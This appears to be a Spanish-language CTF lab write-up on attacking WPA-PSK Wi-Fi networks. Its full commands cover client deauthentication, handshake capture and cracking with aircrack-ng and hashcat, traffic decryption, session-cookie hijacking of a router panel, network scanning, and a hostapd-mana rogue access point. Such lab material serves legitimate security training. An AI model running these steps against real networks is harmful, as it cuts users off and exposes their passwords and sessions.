Challenges PSK
En este capítulo vamos a realizar los siguientes retos:
Challenge 08 - ¿Cuál es la contraseña del punto de acceso wifi-mobile?
Challenge 09 - ¿Cuál es la IP del servidor web en la red wifi-mobile?
Challenge 10 - ¿Cuál es la flag después de iniciar sesión en wifi-mobile?
Challenge 11 - ¿Existe aislamiento de clientes en la red wifi-mobile?
Challenge 12 - ¿Cuál es la contraseña de wifi-offices?
Challenge 08
¿Cuál es la contraseña del punto de acceso wifi-mobile?
Activamos el modo monitor
## Detener NertworkManager para evitar conflicto con las interfaces
systemctl stop NetworkManager
## Activamos la interfaz y ponemos en modo monitor
# Desactivamos la interfaz {wlan0}
ip link set wlan0 down
# Modo monitor {wlan0}
iwconfig wlan0 mode monitor
# Activamos la interfaz {wlan0}
ip link set wlan0 up
# Comprobamos modo monitor {wlan0}
iwconfig wlan0
Escanemos todas la redes hasta encontrar el BSSID y channel de la wifi-mobile -->
airodump-ng wlan0

Ahora escaneamos exclusiviamente ese canal y ese bssid -->
airodump-ng wlan0 --band bag -c 6 --bssid F0:9F:C2:71:22:12 -w /home/user/wifi/PSK/wifi-mobile

Para obtener el handshake, debemos esperar a que un cliente se autentifique solo a la red, o hacer un ataque de des autentificación -->
Espera del handshake

Ataque de des autentificación
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 -c 28:6C:07:6F:F9:43 wlan0
-0 10
: 10 siendo la cantidad de paquetes que queremos mandar para des autentificar-a
: El BSSID de la red / wifi-mobile-c
: La MAC de un usuario conectado a esa red

TAMBIEN se puede hacer sin especificar la MAC "-c" para des autentificar a todo los usuarios de la red, solo que algunos AP da problemas:
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0
Ahora vemos que en la seccion NOTES : EAPOL
por que tenemos el handshake de esos usuarios

Utilizamos aircrack-ng
para romper la contraseña del handshake
, previamente habiendo capturado el trafico con airodump-ng
-->
aircrack-ng -w /root/rockyou-top100000.txt wifi-mobile-02.cap

Challenge 09
¿Cuál es la IP del servidor web en la red wifi-mobile?
Tras tener la clave de la wifi y el handshake, podemos descifrar todo el trafico previamente recogido y verlo con airdecap-ng
-->
airdecap-ng -e wifi-mobile -p starwars1 wifi-mobile-02.cap
-e
: Nombre de la wifi/bssid-p
: Contraseña crackeada.cap
: Trafico y handshake capturado

Vemos que se ha
descifrado 5402 paquetes
y este nuevo archivo descifrado se guarda como
-dec
Ahora abrimos con wireshark para leer le trafico:
wireshark wifi-mobile-02-dec.cap

Vemos mucho trafico TCP y entre ello, conexiones a la 192.168.2.1
(siendo este el servidor/router)

Viendo asi el panel de login del router y como un usaurio esta dentro con un COOKIE seteada
Challenge 10
¿Cuál es la flag después de iniciar sesión en wifi-mobile?
Ahora sabieno la ip y la cookie, solo nos queda conectarnos con wpa_supplicant y lo configuramos con la info del AP para conectarnos -->
## Creamos el archivo wpa_supplicant
nano wifi-mobile.conf
## Configuramos
network={
ssid="wifi-mobile"
psk="starwars1"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}
## Nos conectamos con wpa_supplicant a la red
wpa_supplicant -i wlan2 -c wifi-mobile.conf

Ahora utilizamos dhclient
para obtener IP -->
dhclient -v wlan2

Apuntamos a la web 192.168.2.1:80
desde el navegador -->

No tenemos usuario y contraseña pero si una COOKIE
de session obtenida con el wireshark, que modificamos, reemplazamos y reinicamos la web -->

Esto funciona porla la cookie en la web esta mal configurada con un
HttpOnly=false

Challenge 11
¿Existe aislamiento de clientes en la red wifi-mobile?
Para saber esto, una vez conetados, podemos lanzar un escaneo a la red con arp-scan para ver los equipos conectados:
arp-scan -I wlan2 -l

Ahora podemos lanzar un nmap al 192.168.2.7
para ver que puertos tiene abiertos -->
nmap -p- --open -sS 192.168.2.7 -n -Pn
############################################
PORT STATE SERVICE
80/tcp open http
Ahora siendo que tiene una web por detrás, podemos hacer un curl
o ir directamente del el navegador
:

Challenge 12
¿Cuál es la contraseña de wifi-offices?
Al escanear los APs, vemos que existen dos usuarios conectados una wifi-officies
, pero no vemos el AP
ni su BSSID
-->

Asi que podemos hacer un ataque de NO AP
, con hostapd-mana
Hostapd-mana
## Creamos un fichero de hostapd
nano wifi-offices-hostapd.conf
## Configuramos
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
## Ejecutamos hostapd-mana
hostapd-mana wifi-offices-hostapd.conf

Con esto obtenemos el handshake de dos usuarios conectados. Y ahora podemos coger solo el hash con awk
-->
cat hostapd.hccapx | awk '{print $3}' > wifi-offices-hostapd.22000

Ahora en formato 22000
, podemos pasarselo a hashcat
para crackear la contraseña -->
hashcat -a 0 -m 22000 wifi-offices-hostapd.22000 /root/rockyou-top100000.txt --force

Last updated